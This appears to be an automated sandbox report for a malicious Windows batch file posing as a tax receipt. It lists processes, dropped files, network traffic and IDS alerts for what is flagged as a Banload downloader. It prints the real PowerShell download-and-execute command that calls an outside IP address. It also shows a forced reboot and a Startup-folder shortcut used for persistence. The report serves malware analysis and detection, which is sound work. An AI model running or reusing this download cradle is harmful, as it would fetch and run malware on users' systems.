Field | Value
---|---|
File name | Comprobante_fiscal_Ref-125487.bat
Full analysis | https://app.any.run/tasks/982ca7c8-341a-47a6-9016-396ca7500d42
Verdict | Malicious activity
Analysis date | May 15, 2019, 17:37:26
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | text/x-msdos-batch
File info | DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5 | CC71459173670726B3D1EA7CE9D39732
SHA1 | B6B8B4B0BA64F7632A9946E088641F4B348EC9E1
SHA256 | B4B172EED1FF6A29E06811B259CF36556CA1A472E2BD7B0B19541E06DD7E77F1
SSDEEP | 24:XO+6uSseKXzQc7IFPBAc+LZDDWXmhgpZT:++TE47IFPBAc+LZDDW26T

PID | CMD | Path | Indicators | Parent process
---|---|---|---|---|
2620 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Comprobante_fiscal_Ref-125487.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe
2760 | C:\Windows\system32\cmd.exe /S /D /c" echo ieX("IeX(New-oBJeCt Net.WebClIeNt).DOwnlOadStRING('http://144.202.68.139/lds25/kk/20938092830482')"); " | C:\Windows\system32\cmd.exe | — | cmd.exe
2492 | WindowsPowerShell\v1.0\powershell.exe -nop -win 1 - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe
3572 | "C:\WINDOWS\system32\shutdown.exe" -r -t 200 | C:\WINDOWS\system32\shutdown.exe | — | powershell.exe
1692 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\System32\SearchProtocolHost.exe | — | SearchIndexer.exe

PID | User | Company | Integrity Level | Description | Version | Exit code
---|---|---|---|---|---|---|
2620 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
2760 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
2492 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0
3572 | admin | Microsoft Corporation | MEDIUM | Windows Shutdown and Annotation Tool | 6.1.7600.16385 (win7_rtm.090713-1255) | 0
1692 | SYSTEM | Microsoft Corporation | SYSTEM | Microsoft Windows Search Protocol Host | 7.00.7600.16385 (win7_rtm.090713-1255) | —

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---|
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3IULSW28MF3TWQQJKOAG.temp | — | — | —
2492 | powershell.exe | C:\Users\Public\Java_pgajdy9_\pp.png | — | — | —
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
2492 | powershell.exe | C:\users\public\Java_pgajdy9_\Java_pgajdy9_.zip | compressed | 91AD5E72E197373753D193E189C07145 | 27F7C3059FA051DA825EF62599EB9A1889BB71C15EB2C2ED887434C7EFF51363
2492 | powershell.exe | C:\users\public\c.lnk | lnk | 3E3C2575AD74451DEE2B959E1E2338FD | C0A4318749233AAC90B8D1D1A2CFF6F5049F7F3CA015A62969437C8CC3A0E9ED
2492 | powershell.exe | C:\users\public\Java_pgajdy9_\Java_pgajdy9_1.LNS | text | BAD58F227E5BECA5D3028897B830B1A2 | CA37CDECB15EFEB212FECD651E22329D5779DAAAF9FE177F034D525990186925
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11f838.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java_pgajdy9_.lnk | lnk | 6A970D08DB189EF10A5FD5909088F5F9 | 8E1047D4C63DDA73ED881C435B15319E6ABA198AD06226D4F019B01BCD344635
2492 | powershell.exe | C:\users\public\Java_pgajdy9_\Java_pgajdy9_.LNS | executable | D66208DE7F9C6A6CE07242F96C55EEA8 | 7C2F4D3DB220CA5FABCC746C0867895ACA39F5E4A0EB0606C82C51CC0C4ECC8C
2492 | powershell.exe | C:\users\public\i.dat | text | 313CAEA4BA84A1CAC897FB4BD44148FA | 97196FC1E13732643483E245BC037A05526F93C1A392237CDAC2048FFBAC7C8F

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---|
2492 | powershell.exe | GET | 200 | 144.202.68.139:80 | http://144.202.68.139/lds25/kk/20938092830482 | US | text | 7.82 Kb | malicious |
2492 | powershell.exe | GET | 200 | 144.202.68.139:80 | http://144.202.68.139/mds25/kk/md.zip | US | compressed | 11.4 Mb | malicious |

PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---|
2492 | powershell.exe | 144.202.68.139:80 | — | Baltimore Technology Park, LLC | US | malicious |

PID | Process | Class | Message
---|---|---|---|
2492 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Downloader.Banload |
2492 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host ZIP Request |